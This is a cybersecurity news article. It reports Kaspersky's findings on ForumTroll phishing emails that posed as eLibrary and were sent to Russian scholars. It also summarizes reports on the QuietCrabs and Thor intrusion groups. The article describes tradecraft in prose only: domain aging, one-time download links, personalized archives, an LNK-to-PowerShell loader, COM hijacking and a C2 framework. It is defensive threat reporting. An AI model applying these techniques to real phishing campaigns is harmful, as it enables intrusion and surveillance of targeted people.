New ForumTroll Phishing Attacks Target Russian Scholars Using Fake eLibrary Emails - The Hacker News

New ForumTroll Phishing Attacks Target Russian Scholars Using Fake eLibrary Emails Ravie LakshmananDec 17, 2025Vulnerability / Malware The threat actor linked to Operation ForumTroll has been attributed to a fresh set of phishing attacks targeting individuals within Russia, according to Kaspersky. The Russian cybersecurity vendor said it detected the new activity in October 2025. The origins of the threat actor are presently unknown. "While the spring cyberattacks focused on organizations, the fall campaign honed in on specific individuals: scholars in the field of political science, international relations, and global economics, working at major Russian universities and research institutions," security researcher Georgy Kucherin said. Operation ForumTroll refers to a series of sophisticated phishing attacks exploiting a then-zero-day vulnerability in Google Chrome (CVE-2025-2783) to deliver the LeetAgent backdoor and a spyware implant known as Dante. The latest attack wave also commences with emails that claimed to be from eLibrary, a Russian scientific electronic library, with the messages sent from the address "support@e-library[.]wiki." The domain was registered in March 2025, six months before the start of the campaign, suggesting that preparations for the attack had been underway for some time. Kaspersky said the strategic domain aging was done to avoid raising any red flags typically associated with sending emails from a freshly registered domain. In addition, the attackers also hosted a copy of the legitimate eLibrary homepage ("elibrary[.]ru") on the bogus domain to maintain the ruse. The emails instruct prospective targets to click on an embedded link pointing to the malicious site to download a plagiarism report. Should a victim follow through, a ZIP archive with the naming pattern "<LastName>_<FirstName>_<Patronymic>.zip" is downloaded to their machine. What's more, these links are designed for one-time use, meaning any subsequent attempts to navigate to the URL cause it to display a Russian language message stating "Download failed, please try again later." In the event, the download is attempted from a platform other than Windows, the user is prompted to "try again later on a Windows computer." "The attackers also carefully personalized the phishing emails for their targets, specific professionals in the field," the company said. "The downloaded archive was named with the victim's last name, first name, and patronymic." The archive contains a Windows shortcut (LNK) with the same name, which, when executed, runs a PowerShell script to download and launch a PowerShell-based payload from a remote server. The payload then contacts a URL to fetch a final-stage DLL and persist it using COM hijacking. It also downloads and displays a decoy PDF to the victim.  The final payload is a command-and-control (C2) and red teaming framework known as Tuoni, enabling the threat actors to gain remote access to the victim's Windows device. "ForumTroll has been targeting organizations and individuals in Russia and Belarus since at least 2022," Kaspersky said. "Given this lengthy timeline, it is likely this APT group will continue to target entities and individuals of interest within these two countries." The disclosure comes as Positive Technologies detailed the activities of two threat clusters, QuietCrabs – a suspected Chinese hacking group also tracked as UTA0178 and UNC5221 – and Thor, which appears to be involved in ransomware attacks since May 2025. These intrusion sets have been found to leverage security flaws in Microsoft SharePoint (CVE-2025-53770), Ivanti Endpoint Manager Mobile (CVE-2025-4427 and CVE-2025-4428), Ivanti Connect Secure (CVE-2024-21887), and Ivanti Sentry (CVE-2023-38035). Attacks carried out by QuietCrabs take advantage of the initial access to deploy an ASPX web shell and use it to deliver a JSP loader that's capable of downloading and executing KrustyLoader, which then drops the Sliver implant. "Thor is a threat group first observed in attacks against Russian companies in 2025," researchers Alexander Badayev, Klimentiy Galkin, and Vladislav Lunin said. "As final payloads, the attackers use LockBit and Babuk ransomware, as well as Tactical RMM and MeshAgent to maintain persistence." Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post. SHARE     Tweet Share Share SHARE  Advanced Persistent Threat, Command and Control, cybersecurity, Kaspersky, Malware, Microsoft SharePoint, Phishing, powershell, ransomware, Vulnerability, zero-day Trending News AI Will Change Cybersecurity. Humans Will Define Its Success. A Lesson No Algorithm Can Teach BKA Identifies REvil Leaders Behind 130 German Ransomware Attacks The AI Arms Race – Why Unified Exposure Management Is Becoming a Boardroom Priority Microsoft Details Cookie-Controlled PHP Web Shells Persisting via Cron on Linux Servers Block the Prompt, Not the Work: The End of "Doctor No" New GPUBreach Attack Enables Full CPU Privilege Escalation via GDDR6 Bit-Flips Anthropic's Claude Mythos Finds Thousands of Zero-Day Flaws Across Major Systems China-Linked Storm-1175 Exploits Zero-Days to Rapidly Deploy Medusa Ransomware New SparkCat Variant in iOS, Android Apps Steals Crypto Wallet Recovery Phrase Images New Chrome Zero-Day CVE-2026-5281 Under Active Exploitation — Patch Released Docker CVE-2026-34040 Lets Attackers Bypass Authorization and Gain Host Access ⚡ Weekly Recap: Axios Hack, Chrome 0-Day, Fortinet Exploits, Paragon Spyware and More Fortinet Patches Actively Exploited CVE-2026-35616 in FortiClient EMS Hackers Exploit CVE-2025-55182 to Breach 766 Next.js Hosts, Steal Credentials Apple Expands iOS 18.7.7 Update to More Devices to Block DarkSword Exploit Microsoft Warns of WhatsApp-Delivered VBS Malware Hijacking Windows via UAC Bypass Load More ▼ Popular Resources [Demo] Discover SaaS Risks and Monitor Every App in Your Environment SANS SEC401: Get Hands On Skills to Detect and Respond to Cyber Threats [Guide] Learn How to Govern AI Agents With Proven Market Guidance Detect AI-Driven Threats Faster With Full Network Visibility